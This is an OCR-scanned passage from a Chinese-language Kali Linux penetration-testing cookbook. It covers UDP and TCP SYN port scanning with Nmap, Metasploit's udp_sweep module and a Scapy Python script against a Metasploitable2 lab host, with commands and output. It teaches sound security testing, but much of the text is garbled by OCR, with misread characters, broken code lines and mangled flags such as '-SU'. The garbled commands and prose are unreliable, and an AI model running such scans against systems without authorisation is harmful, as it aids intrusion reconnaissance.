root@KaliLinux:~# chmod 777 udp scan.py 

root@KaliLinux:~# ./udp scan.py 

Usage - ./udp scan.py [Target-IP] [First Port] [Last Port] 
Example - ./udp scan.py 10.0.0.5 1 100 

Example will UDP port scan ports 1 through 100 on 10.0.0.5 
root@KaliLinux:~ # ./udp scan.py 172.16.36.135 1 100 


超时 为 5 秒 用 于 接受 受到 ICMP 不 可 达 速 率 限制 的 响应 。 即 使 拥有 了 更 大 的 响应 
接收 窗口 ， 这 种 方式 的 扫描 仍然 有 时 不 可 靠 。 这 就 是 UDP 探测 扫描 是 更 加 高 效 的 
替代 方案 的 原因 。 


工作 原理 


这 个 秘籍 中 ，UDP 扫描 通过 识别 不 回复 ICMP 端口 不 可 达 响 应 的 端口 来 识别 。 这 
个 过 程 非常 耗费 时 间 ， 因 为 ICMP 端口 不 可 达 响 应 通常 有 速率 限制 。 有 了 时候， 对 于 
不 生成 这 种 响应 的 系统 ， 这 种 方式 会 不 可 竺 ， 并 且 ICMP 通常 会 被 防火 墙 过 滤 。 替 
代 方 式 就 是 使 用 服务 特定 的 探 针 来 请 求 正 面 的 响应 。 这 个 技巧 会 在 下 面 的 两 个 秘籍 
中 展示 。 


3.4 Nmap UDP 扫描 


Nmap 拥有 可 以 执行 远程 系统 上 的 UDP 扫描 的 选项 。Nmap 的 UDP 扫描 方式 更 加 
复杂 ， 它 通过 注入 服务 特定 的 谭 泽 请 求 ， 来 请 求 正面 的 响应 ， 用 于 确认 指定 服务 的 
存在 ， 来 识别 活动 服务 。 这 个 秘籍 演示 了 如 何 使 用 Nmap UDP 扫描 来 扫描 单一 端 
口 ， 多 个 端口 ， 甚 至 多 个 系统 。 


准备 


为 了 使 用 Nmap 执行 UDP 扫描 ， 你 需要 一 个 运行 UDP 网 络 服务 的 远程 服务 器 。 
这 个 例子 中 我 们 使 用 Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 的 更 
多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


操作 步骤 


UDP 扫描 通常 由 挑战 性 ， 消 耗 时 间 ， 非 党 麻烦 。 许 多 系统 会 限制 ICMp 主机 不 可 达 
响应 ， 并 且 增 加 扫描 大 量 端口 或 系统 所 需 的 时 间 总 数 。 幸 运 的 是 ，Nmap 的 开发 者 
拥有 更 加 复杂 和 高 效 的 工具 来 识别 远程 系统 上 的 UDP 服务 。 为 了 使 用 Nmap 执行 
UDP 扫描 ， 需 要 使 用 -sU 选项 ， 并 带 上 需要 扫描 的 主机 IP 地 址 。 


root@KaliLinux:~# nmap -SU 172.16.36.135 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:04 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.0016s latency). 

Not shown: 993 closed ports 

PORT STATE SERVICE 

53/udp open domain 

68/udp open|filtered dhcpc 

69/udp open|filtered tftp 


111/udp open rpcbind 
137/udp open netbios-ns 
138/udp open|filtered netbios-dgm 
2049/udp open nfs 


MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 1043.91 seconds 


虽然 Nmap 使 用 针对 多 种 服务 的 自 定义 载荷 来 请 求 UDP 端口 的 响应 。 在 没有 使 用 
其 它 参 数 来 指定 目标 端口 时 ， 它 仍旧 需要 大 量 时 间 来 扫描 默认 的 1000 个 端口 。 你 
可 以 从 扫描 元 数据 中 看 到 ， 默 认 的 扫描 需要 将 近 20 分 钟 来 完成 。 作 为 蔡 代 ， 我 们 
可 以 缩短 所 需 的 扫描 时 间 ， 通 过 使 用 下 列 名 Ingles 执 行 针 对 性 扫描 : 


root@KaliLinux:~# nmap 172.16.36.135 -SU -p 53 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:05 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.0010s latency). 

PORT STATE SERVICE 53/udp open 

domain MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds 


如 果 我 们 指定 了 需要 扫描 的 特定 端口 ， 执 行 UDP 扫描 所 需 的 的 时 间 总 量 可 以 极 大 
江 少 。 这 可 以 通过 执行 UDP 扫描 并 且 使 用 -p 选项 指定 端口 来 实现 。 在 下 面 的 例 
子 中 ， 我 们 仅仅 在 53 端口 上 执行 扫描 ， 来 尝试 识别 DNS 服务 。 也 可 以 在 多 个 指 
定 的 端口 上 指定 扫描 ， 像 这 样 : 


root@KaliLinux:~# nmap 172.16.36.135 -SU -p 1-100 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:06 EST 
Nmap scan report for 172.16.36.135 
Host is up (0.00054s latency). 

Not shown: 85 open|filtered ports 
PORT STATE SERVICE 

8/udp closed unknown 

15/udp closed unknown 

28/udp closed unknown 

37/udp closed time 

45/udp closed mpm 

49/udp closed tacacs 

53/udp open domain 

56/udp closed xns-auth 

70/udp closed gopher 

71/udp closed netrjs-1 

74/udp closed netrjs-4 

89/udp closed su-mit-tg 

90/udp closed dnsix 

95/udp closed supdup 

96/udp closed dixie 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 23.56 seconds 


在 这 个 例子 中 ， 扫 描 在 前 100 个 端口 上 执行 。 这 通过 使 用 破 折 号 符号 ， 并 指定 要 扫 
描 的 第 一 个 和 最 后 一 个 端口 来 完成 。Nmap 之 后 启动 多 个 进程 ， 会 同时 扫描 这 两 个 

值 之 间 的 多 有 端口 。 在 一 些 情况 下 ，UDP 分 析 需 要 在 多 个 系统 上 执行 。 可 以 使 用 破 
折 号 符号 ， 并 且 定 义 最 后 一 个 IP 上段 的 值 的 范围 ， 来 扫描 范围 内 的 主机 。 


root@KaliLinux:~# nmap 172.16.36.0-255 -SU -p 53 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:08 EST 
Nmap scan report for 172.16.36.1 

Host is up (0.00020s latency). 

PORT STATE SERVICE 

53/udp closed domain 

MAC Address: 00:50:56:C0:00:08 (VMware) 


Nmap scan report for 172.16.36.2 

Host is up (0.039s latency). 

PORT STATE SERVICE 

53/udp closed domain 

MAC Address: 00:50:56:FF:2A:8E (VMware) 


Nmap scan report for 172.16.36.132 

Host is up (0.00065s latency). 

PORT STATE SERVICE 

53/udp closed domain 

MAC Address: 00:0C:29:65:FC:D2 (VMware) 


Nmap scan report for 172.16.36.135 

Host is up (0.00028s latency). 

PORT STATE SERVICE 

53/udp open domain 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 256 IP addresses (6 hosts up) scanned in 42.81 second 
S 


这 个 例子 中 ， 扫 描 对 172.16.36.0/24 中 所 有 活动 主机 执行 。 每 个 主机 都 被 扫描 
来 识别 是 否 在 53 端口 上 运行 了 DNS 服务 。 另 一 个 用 于 扫描 多 个 主机 替代 选项 ， 就 
是 使 用 IP 地 址 输入 列表 。 为 了 这 样 做 ， 使 用 -iL 选项 ， 并 且 应 该 传 入 相同 目录 下 
的 文件 名 称 ， 或 者 单独 目录 下 的 完成 文件 路 径 。 前 者 的 例子 如 下 : 


root@KaliLinux:~# nmap -iL iplist.txt -sU -p 123 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:16 EST 
Nmap scan report for 172.16.36.1 

Host is up (0.00017s latency). 

PORT STATE SERVICE 

123/udp open ntp 

MAC Address: 00:50:56:C0:00:08 (VMware) 


Nmap scan report for 172.16.36.2 

Host is up (0.00025s latency). 

PORT STATE SERVICE 

123/udp open|filtered ntp 

MAC Address: 00:50:56:FF:2A:8E (VMware) 


Nmap scan report for 172.16.36.132 

Host is up (0.00040s latency). 

PORT STATE SERVICE 

123/udp closed ntp 

MAC Address: 00:0C:29:65:FC:D2 (VMware) 


Nmap scan report for 172.16.36.135 

Host is up (0.00031s latency). 

PORT STATE SERVICE 

123/udp closed ntp 

MAC Address: 00:0C:29:3D:84:32 (VMware) 

Nmap done: 4 IP addresses (4 hosts up) scanned in 13.27 seconds 


这 个 例子 中 ， 执 行 了 扫描 来 判断 NTP 服务 是 否 运行 在 当前 执行 目录 中 
的 iplist.txt 文件 内 的 任何 系统 的 123 端口 上 。 


工作 原理 


虽然 Nmap 仍然 含有 许多 和 UDP 扫描 相关 的 相同 挑战 ， 它 仍 占 是 个 极其 高 效 的 解 
决 方案 ， 因 为 它 使 用 最 高 效 和 快速 的 技巧 组 合 来 识别 活动 服务 。 


3.5 Metasploit UDP 扫描 


Metasploit 拥有 一 个 辅助 模块 ， 可 以 用 于 扫描 特定 的 常用 UDP 端口 。 这 个 秘籍 展 
示 了 如 何 使 用 这 个 辅助 模块 来 扫描 运行 UDP 服务 的 单个 系统 或 多 个 系统 


准备 
为 了 使 用 Metasploit 执行 UDP 扫描 ， 你 需要 一 个 运行 UDP 网 络 服务 的 远程 服务 


器 。 FP RAT IR A Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 
的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" 秘 籍 。 


操作 步骤 


在 定义 所 运行 的 模块 之 前 ， 需 要 打开 Metasploit。 为 了 在 Kali 中 打开 它 ， 我 们 在 终 
端 会 话 中 执行 msfconsole 命令 。 


root@KaliLinux:~# msfconsole 
# cowsay++ 





< metasploit > 


\ 2 
\ (00) 
(=) )\ 


Large pentest? List, sort, group, tag and search your hosts and 
services in Metasploit Pro -- type 'go pro' to launch it now. 


-[ metasploit v4.6.0-dev [core:4.6 api:1.0] 
+ -- --=[ 1053 exploits - 590 auxiliary - 174 post 
+ -- --z[ 275 payloads - 28 encoders - 8 nops 


msf » use auxiliary/scanner/discovery/udp. sweep 
msf  auxiliary(udp sweep) > show options 


Module options (auxiliary/scanner/discovery/udp sweep): 


Name Current Setting Required Description 
BATCHSIZE 256 yes The number of hosts to 
probe in each set 

CHOST no The local client addre 
ss 

RHOSTS yes The target address ran 
ge or CIDR identifier 

THREADS 1 yes The number of concurre 


nt threads 


为 了 在 Metasploit 中 运行 UDP 扫描 模块 ， 我 们 以 模块 的 相对 路 径 调用 use 命 

令 。 一 旦 选择 了 模块 ， 可 以 使 用 show options 命令 来 确认 或 更 改 扫 描 配置 。 这 
个 命令 会 展示 四 个 列 的 表格 ， 包 

括 name ^ current settings ^ required 和 description ° name 列 标 出 
了 每 个 可 配置 变量 的 名 称 。 current settings 列 列 出 了 任何 给 定 变 量 的 现 有 配 
置 。 required 列 标 出 对 于 任何 给 定 变 量 ， 值 是 否 是 必须 的 。 description 列 描 
述 了 每 个 变量 的 功能 。 任 何 给 定 变 量 的 值 可 以 使 用 set 命令 ， 并 且 将 新 的 值 作为 
参数 来 修改 。 


msf auxiliary(udp sweep) > set RHOSTS 172.16.36.135 
RHOSTS => 172.16.36.135 

msf  auxiliary(udp sweep) > set THREADS 20 

THREADS => 20 

msf auxiliary(udp_sweep) > show options 


Module options (auxiliary/scanner/discovery/udp sweep): 


Name Current Setting Required Description 
BATCHSIZE 256 yes The number of hosts to 
probe in each set 

CHOST no The local client addre 
ss 

RHOSTS 17216. 36 135 yes The target address ran 
ge or CIDR identifier 

THREADS 20 yes The number of concurre 


nt threads 


在 上 面 的 例子 中 ， RHosTS 值 修 改 为 我 们 打算 扫描 的 远程 系统 的 IP 地 址 。 此 外 ， 
线程 数量 修改 为 20。 THREADS 的 值 定义 了 在 后 台 执 行 的 当前 任务 数量 。 确 定 线程 
数量 涉及 到 寻找 一 个 平衡 ， 既 能 提升 任务 速度 ， 又 不 会 过 度 消 耗 系 统 资 源 。 对 于 多 
数 系统 ，20 个 线程 可 以 足够 快 ， 并 且 相 当 合 理 。 修 改 了 必要 的 变量 之 后 ， 可 以 再 次 
使 用 show options 命令 来 验证 。 一 旦 所 需 配置 验证 完毕 ， 就 可 以 执行 扫描 了 。 


msf  auxiliary(udp sweep) > run 


[*] Sending 12 probes to 172.16.36.135->172.16.36.135 (1 hosts) 
[*] Discovered Portmap on 172.16.36.135:111 (100000 v2 TCP(111), 
100000 v2 UDP(111), 100024 v1 UDP(36429), 100024 vi TCP(56375), 
100003 v2 UDP(2049), 100003 v3 UDP(2049), 100003 v4 UDP(2049), 
100021 v1 UDP(34241), 100021 v3 UDP(34241), 100021 v4 UDP(34241) 
, 100003 v2 TCP(2049), 100003 v3 TCP(2049), 100003 v4 TCP(2049), 
100021 v1 TCP(50333), 100021 v3 TCP(50333), 100021 v4 TCP(50333 
), 100005 v1 UDP(47083), 100005 vi TCP(57385), 100005 v2 UDP(470 

83), 100005 v2 TCP(57385), 100005 v3 UDP(47083), 100005 v3 TCP(5 

7385)) 

[*] Discovered NetBIOS on 172.16.36.135:137 (METASPLOITABLE: «00» 
:U :METASPLOITABLE:<03>:U :METASPLOITABLE:<20>:U : MSBROWSE :< 

01>:G :WORKGROUP:«00»:G :WORKGROUP:«1d»:U :WORKGROUP:«1e»:G :00: 

00:00:00:00:00) 

[*] Discovered DNS on 172.16.36.135:53 (BIND 9.4.2) 

[*] Scanned 1 of 1 hosts (100% complete) 

[*] Auxiliary module execution completed 


Metasploit 中 所 使 用 的 run 命令 用 于 执行 所 选 的 辅助 模块 。 在 上 面 的 例子 
中 ， run 命令 对 指定 的 IP 地 址 执行 UDP 扫描 。 udp_sweep 模块 也 可 以 使 用 破 
折 号 符号 ， 对 地 址 序列 执行 扫描 。 


msf  auxiliary(udp sweep) > set RHOSTS 172.16.36.1-10 
RHOSTS => 172.16.36.1-10 
msf  auxiliary(udp sweep) > show options 


Module options (auxiliary/scanner/discovery/udp sweep): 


Name Current Setting Required Description 
BATCHSIZE 256 yes The number of hosts to 
probe in each set 

CHOST no The local client addre 
ss 

RHOSTS 172.16.36.1-10 yes The target address ran 
ge or CIDR identifier 

THREADS 20 yes The number of concurre 


nt threads 
msf  auxiliary(udp sweep) > run 


[*] Sending 12 probes to 172.16.36.1->172.16.36.10 (10 hosts) 
[*] Discovered NetBIOS on 172.16.36.1:137 (MACBOOKPRO-3E0F:<00>: 
U :00:50:56:c0:00:08) 

[*] Discovered NTP on 172.16.36.1:123 (NTP v4 (unsynchronized) ) 
[*] Discovered DNS on 172.16.36.2:53 (BIND 9.3.6-P1-RedHat-9.3.6 
-20. P1.el5 8.6) 

[*] Scanned 10 of 10 hosts (100% complete) 

[*] Auxiliary module execution completed 


在 上 面 的 例子 中 ，UDP 扫描 对 10 个 主机 地 址 执行 ， 它 们 由 RHOSTS 变量 指定 。 与 
之 相似 ， RHOSTS 可 以 使 用 CIDR 记 法 来 定义 网 络 范围 ， 像 这 样 : 


msf  auxiliary(udp sweep) > set RHOSTS 172.16.36.0/24 
RHOSTS -» 172.16.36.0/24 
msf  auxiliary(udp sweep) > show options 


Module options (auxiliary/scanner/discovery/udp sweep): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to 
probe in each set 

CHOST no The local client addres 
S 

RHOSTS 172.16.36.0/24 yes The target address rang 
e or CIDR identifier 

THREADS 20 yes The number of concurren 
t threads 


msf  auxiliary(udp sweep) > run 


[*] Sending 12 probes to 172.16.36.0->172.16.36.255 (256 hosts) 
[*] Discovered Portmap on 172.16.36.135:111 (100000 v2 TCP(111), 
100000 v2 UDP(111), 100024 v1 UDP(36429), 100024 vi TCP(56375), 
100003 v2 UDP(2049), 100003 v3 UDP(2049), 100003 v4 UDP(2049), 
100021 v1 UDP(34241), 100021 v3 UDP(34241), 100021 v4 UDP(34241) 
, 100003 v2 TCP(2049), 100003 v3 TCP(2049), 100003 v4 TCP(2049), 
100021 v1 TCP(50333), 100021 v3 TCP(50333), 100021 v4 TCP(50333 
), 100005 v1 UDP(47083), 100005 vi TCP(57385), 100005 v2 UDP(470 
83), 100005 v2 TCP(57385), 100005 v3 UDP(47083), 100005 v3 TCP(5 
7385)) 
[*] Discovered NetBIOS on 172.16.36.135:137 (METASPLOITABLE: «00» 
:U :METASPLOITABLE:<03>:U :METASPLOITABLE:<20>:U : MSBROWSE :< 
01>:G :WORKGROUP:«00»:G :WORKGROUP:«1d»:U :WORKGROUP:«1e»:G :00: 
00:00:00:00:00) 
[*] Discovered NTP on 172.16.36.1:123 (NTP v4 (unsynchronized)) 
[*] Discovered NetBIOS on 172.16.36.1:137 (MACBOOKPRO-S3EOF: «00»: 
U :00:50:56:c0:00:08) [*] Discovered DNS on 172.16.36.0:53 (BIND 
9.3.6-P1-RedHat-9.3.6-20. P1.el15 8.6) 


[*] Discovered DNS on 172.16.36.2:53 (BIND 9.3.6-P1-RedHat-9.3.6 
-20. P1.el5 8.6) 

[*] Discovered DNS on 172.16.36.135:53 (BIND 9.4.2) 

[*] Discovered DNS on 172.16.36.255:53 (BIND 9.3.6-P1-RedHat-9.3 
.6-20. P1.el5 8.6) 

[*] Scanned 256 of 256 hosts (100% complete) 

[*] Auxiliary module execution completed 


工作 原理 


Metasploit 辅助 模块 中 的 UDP 扫描 比 起 Nmap 更 加 简单 。 它 仅仅 针对 有 限 的 服务 
数量 ， 但 是 在 识别 端口 上 的 活动 服务 方面 更 加 高 效 ， 并 且 比 其 它 可 用 的 UDP 扫描 
器 更 快 。 


3.6 Scapy 隐秘 扫描 


执行 TCP 端口 扫描 的 一 种 方式 就 是 执行 一 部 分 。 目 标 端口 上 的 TCP 三 次 握手 用 于 
识别 端口 是 否 接受 连接 。 这 一 类 型 的 扫描 指 代 隐 秘 扫描 ，SYN 扫描 ， 或 者 半 开 放 
扫描 。 这 个 秘籍 演示 了 如 何 使 用 Scapy 执行 TCP 隐秘 扫描 。 


准备 
为 了 使 用 Scapy 执行 TCP 隐秘 扫描 ， 你 需要 一 个 运行 PUn 网 络 服务 的 远程 服务 
器 。 PNE S ad Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 


的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2” 秘 o 


此 外 ， 这 一 节 也 需要 编写 脚本 的 更 多 信息 ， 请 参考 第 一 章 中 的 “使 用 文本 编辑 器 
*VIM 和 Nano) 。 


操作 步骤 


为 了 展示 如 何 执行 SYN 扫描 ， 我 们 需要 使 用 Scapy 构造 TCP SYN 请 求 ， 并 识别 
和 开放 端口 、 关 闭 端 口 以 及 无 响应 系统 有 关 的 响应 。 为 了 向 给 定 端口 发 送 TCP 
SYN 请 求 ， 我 们 首先 需要 构建 请 求 的 各 个 层面 。 我 们 需要 构建 的 第 一 层 就 是 IP 
x. 


root@KaliLinux:~# scapy 
Welcome to Scapy (2.2.0) 
>>> i = IP() 
>>> i.display() 
HHH [ IP ]### 

version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 


chksum= None 
src= 127.0.0.1 
dst= 127.0.0.1 
\options\ 
>>> i.dst = "172.16.36.135" 
>>> i.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 
chksum= None 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 


为 了 构建 请 求 的 IP 层 ， 我 们 需要 将 IP TARARE i 。 通 过 调用 display à 
数 ， 我 们 可 以 确定 对 象 的 属性 配置 。 通 常 ， 发 送 和 接受 地 址 都 设 为 回 送 地 

址 ， 127.0.0.1 。 这 些 值 可 以 通过 修改 目标 地 址 来 修改 ， 也 就 是 设置 i.dst 为 
想 要 扫描 的 地 址 的 字符 串 值 。 通 过 再 次 调用 dislay 函数 ， 我 们 看 到 不 仅仅 更 新 的 
目标 地 址 ， 也 自动 更 新 了 和 默认 接口 相关 的 源 IP 地 址 。 现 在 我 们 构建 了 请 求 的 IP 
层 ， 我 们 可 以 构建 TCP ET» 


>>> t = TCP() 

>>> t.display() 

###[ TCP ]### 
sport= ftp_data 
dport= http 
seq= 0 
ack= 0 
dataofs= None 
reserved= 0 
flags= S 
window= 8192 
chksum= None 
urgptr= 0 
options= {} 


为 了 构建 请 求 的 TCP 层 ， 我 们 使 用 和 IP 层 相 同 的 技巧 。 在 这 个 立即 中 ， TCP 对 
RAAT t 变量 。 像 之 前 提 到 的 那样 ， 默 认 的 配置 可 以 通过 调用 display HH 
来 确定 。 这 里 我 们 可 以 看 到 目标 端口 的 默认 值 为 HTTP 端口 80。 对 于 我 们 的 首次 
扫描 ， 我 们 将 TCP 设置 保留 默认 。 现 在 我 们 创建 了 TCP fe IP 层 ， 我 们 需要 将 它 
们 县 放 来 构造 请 求 。 


>>> request = (i/t) 

>>> request.display() 

###[ IP ]### 
version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag= 0 
ttl= 64 
proto= tcp 


chksum= None 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 

###[ TCP ]### 
sport= ftp_data 
dport= http 
seq- 0 
ack- 0 
dataofs- None 
reserved- 0 
flags- S 
window- 8192 
chksum- None 
urgptr- 0 
options- {} 


我 们 可 以 通过 以 斜 杠 分 离 变 量 来 个 放 IP fe TOP 层 。 这 些 层 面 之 后 赋 给 了 新 的 变 
量 ， 它 代表 整个 请 求 。 我 们 之 后 可 以 调用 dispaly 函数 来 查看 请 求 的 配置 。 一 旦 
构建 了 请 求 ， 可 以 将 其 传递 给 sra 元 数 来 分 析 响 应 : 


>>> response = sri(request) 
...Begin emission: 
EET ee Finished to send 1 packets. 


Received 16 packets, got 1 answers, remaining © packets 
>>> response.display() 
###[ IP ]### 

version- 4L 


ihl- 5L 
tos- 0x0 
len- 44 
id- 0 
flags- DF 
frag- OL 
ttl- 64 
proto- tcp 


chksum- 0x9970 
src= 172.16.36.135 
dst- 172.16.36.180 
\options\ 

###[ TCP ]### 
sport= http 
dport= ftp_data 
seq= 2848210323L 


ack= 1 
dataofs= 6L 
reserved= OL 
flags= SA 


window= 5840 

chksum- Oxf82d 

urgptr= 0 

options- [('MSS', 1460) ] 
###[ Padding ]### 

load= '\x00\x00' 
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令 ， 通 过 直接 调用 函数 并 传递 合适 的 参数 : 


>>> sri(IP(dst="172.16.36.135")/TCP(dport=80) ) 
Begin emissromk ee oT Finished to send 1 packets. 
* 


Received 19 packets, got 1 answers, remaining © packets 

«IP version-4L ihl-5L tos=0x0 len-44 id=0 flags-DF frag-OL ttl- 
64 proto-tcp chksum=0x9970 src-172.16.36.135 dst-172.16.36.180 o 
ptions-[] |«TCP sport=http dport-ftp data seq-542529227 ack-1 d 
ataofs-6L reserved=0L flags-SA window-5840 chksum=0x6864 urgptr- 
© options=[('MSS', 1460)] |«Padding load='\x00\x00' |>>> 


要 注意 当 SYN 封包 发 往 目 标 Web 服务 器 的 TCP 端口 80， 并 且 该 端口 上 运行 了 
HTTP 服务 时 ， 响 应 中 会 带 有 TCP 标识 SA 的 值 ， 这 表明 SYN 和 ACK 标识 都 被 
激活 。 这 个 响应 表明 特定 的 目标 端口 是 开放 的 ， 并 接受 连接 。 如 果 相 同类 型 的 封包 
发 往 不 接受 连接 的 端口 ， 会 收 到 不 同 的 请 求 。 


>>> response = sri(IP(dst="172.16.36.135")/TCP(dport=4444) ) 
..Begin emission: 
.Finished to send 1 packets. 
.* Received 7 packets, got 1 answers, remaining 0 packets 
>>> response.display() 
HHH [ IP ]### 
version= 4L 


ihl- 5L 
tos- 0x0 
len- 40 
id= 0 
flags= DF 
frag- OL 
ttl= 64 
proto= tcp 


chksum- 0x9974 
src- 172.16.36.135 
dst- 172.16.36.180 
\options\ 

###[ TCP ]### 
sport= 4444 
dport= ftp_data 
seq= 0 
ack= 1 
dataofs= 5L 
reserved= OL 
flags= RA 
window= 0 
chksum- Oxfd03 
urgptr- 0 
options- {} 

###[ Padding ]### 
load= '\x00\x00\x00\x00\x00\x00' 


当 SYN 请 求 发 送 给 关闭 的 端口 时 ， 返 回 的 响应 中 带 有 TCP 标识 RA， 这 表明 RST 
和 ACK 标识 为 都 被 激活 。ACK 为 仅仅 用 于 承认 请 求 被 接受 ，RST 为 用 于 断 开 连 
接 ， 因 为 端口 不 接受 连接 。 作 为 替代 ， 如 果 SYN 封包 发 往 甬 溃 的 系统 ， 或 者 防火 
墙 过 滤 了 这 个 请 求 ， 就 可 能 接受 不 到 任何 信息 。 由 于 这 个 原因 ， 在 sra BREW 
本 中 使 用 时 ， 应 该 始终 使 用 timeout 选项 ， 来 确保 脚本 不 会 在 无 响应 的 主机 上 挂 
de o 


>>> response = sri(IP(dst="172.16.36.136")/TCP(dport=4444), timeo 
ut=1,verb ose=1) 

Begin emission: 

Finished to send 1 packets 


Received 15 packets, got 0 answers, remaining 1 packets 


如 果 函 数 对 无 响应 的 主机 使 用 时 ， timeout WRAL > BRAARRAETE 
这 个 演示 中 ， timout 值 为 1 秒 ， 用 于 使 这 个 函数 更 加 完备 ， 响 应 的 值 可 以 用 于 判 
断 是 否 收 到 了 响应 : 


root@KaliLinux:~# 

python Python 2.7.3 (default, Jan 2 2013, 16:53:07) 

[GCC 4.7.2] on linux2 

Type "help", "copyright", "credits" or "license" for more inform 
ation. 

>>> from scapy.all import * 

>>> response = sri(IP(dst="172.16.36.136")/TCP(dport=4444), timeo 
ut=1,verb ose=1) 

Begin emission: 

WARNING: Mac address to reach destination not found. Using broad 
cast. Finished to send 1 packets. 


Received 15 packets, got 0 answers, remaining 1 packets 
>>> if response == None: 
print "No Response!!!" 


No Response!!! 


Python 的 使 用 使 其 更 易于 测试 变量 来 识别 sri 函数 是 否 对 其 复制 。 这 可 以 用 作 初 
步 检 验 ， o ch 了 任何 响应 。 对 于 接收 到 的 响应 ， 可 以 执行 一 系列 后 续 
ee AX B] o UOS S LIE Ze Python 脚本 来 完 
成 ， 像 这 


#!/usr/bin/python 


import logging 

logging. getLogger("Scapy.runtime").setLevel(logging.ERROR) 
from scapy.all import * 

import sys 


if len(sys.argv) != 4: 

print "Usage - ./syn_scan.py [Target-IP] [First Port] [Last 
Port]" 

print, "Example -—7synssean-py 10).0;0-5 1 100” 

print "Example will TCP SYN scan ports 1 through 100 on 10.0 
OPS 

sys.exit() 


ip = sys.argv[i] 
start = int(sys.argv[2]) 
end = int(sys.argv[3]) 


for port in range(start,end): 
ans = sri(IP(dst=ip)/TCP(dport=port), timeout=1, verbose=0) 
if ans == None: 
pass 
else: 
if int(ans[TCP].flags) == 18: 
print port 
else: 
pass 


在 这 个 Python 脚本 中 ， 用 于 被 提示 来 输入 IP 地 址 ， 脚 本 之 后 会 对 定义 好 的 端口 序 
列 执行 SYN 扫描 。 脚 本 之 后 会 得 到 每 个 连接 的 响应 ， 并 尝试 判断 响应 的 SYN 和 
ACK 标识 是 否 激活 。 如 果 响 应 中 出 现 并 仅仅 出 现 了 这 些 标识 ， 那 么 会 输出 相应 的 端 
口号 码 。 


root@KaliLinux:~# chmod 777 syn scan.py 

root@KaliLinux:~# ./syn scan.py 

Usage - ./syn scan.py [Target-IP] [First Port] [Last Port] 
Example - ./syn scan.py 10.0.0.5 1 100 

Example will TCP SYN scan ports 1 through 100 on 10.0.0.5 
root@KaliLinux:~# ./syn scan.py 172.16.36.135 1 100 


21 
22 
23 
25 
53 
80 


D CT 输出 会 显示 所 提供 的 IP 地 址 的 系统 上 ， 前 100 个 端口 中 的 开 
VD 


工作 原理 


一 类 型 的 扫描 由 发 送 初始 SYN 封包 给 远程 系统 的 目标 TCP 端口 ， 并 且 通 过 返回 
的 响应 类 型 来 判断 端口 状态 来 完成 。 如 果 远 程 系统 返回 了 SYN+ACK 响应 ， 那 么 它 
正在 准备 建立 连接 ， 我 们 可 以 假设 这 个 端口 开放 。 如 果 服 务 返回 了 RST 封包 ， 这 
就 表明 端口 关闭 并 且 不 接收 连接 。 此 外 ， 如 果 没 有 返回 响应 ， 扫 描 系 统 和 远程 系统 
之 间 可 能 存在 防火 墙 ， 它 丢弃 了 请 求 。 这 也 可 能 表明 主机 前 溃 或 者 目标 IP 上 没有 
关联 任何 系统 。 


3.7 Nmap 隐秘 扫描 


Nmap 拥有 可 以 执行 远程 系统 SYN 扫描 的 扫描 术 € A o 这 个 秘籍 展示 kd 如 何 使 用 
Nmap 执行 TCP 隐秘 扫描 。 


准备 


了 使 用 Nmap 执行 TCP 隐秘 扫描 ， 你 需要 一 个 运行 TCP 网 络 服务 的 远程 服务 
do BR Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 
的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2” 秘 籍 。 


操作 步骤 


就 像 多 数 扫描 需求 那样 ，Nmap 拥有 简 化 TCP 隐秘 扫描 执行 过 程 的 选项 。 为 了 使 
用 Nmap 4447 TCP 隐秘 扫描 ， 应 使 用 -ss 选项 ， 并 附带 被 扫描 主机 的 IP 地 址 。 


root@KaliLinux:~# nmap -sS 172.16.36.135 -p 80 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:47 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00043s latency). 

PORT STATE SERVICE 

80/tcp open http 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds 


在 提供 的 例子 中 ， 特 定 的 IP 地址 的 TCP 80 端口 上 执行 了 TCP 隐秘 扫描 。 和 
Scapy 中 的 技巧 相似 ，Nmap 监听 响应 并 通过 分 析 响 应 TCP 标识 来 识 
别 开 放 端口 。 我 们 也 可 以 使 用 Nmap 执行 多 个 特定 端口 的 扫描 ， 通 过 传递 过 号 分 隔 
的 端口 号 列表 。 


root@KaliLinux:~# nmap -sS 172.16.36.135 -p 21,80,443 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:48 EST 


Nmap scan report for 172.16.36.135 

Host is up (0.00035s latency). 

PORT STATE SERVICE 

21/tcp open ftp 

80/tcp open http 

443/tcp closed https 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds 


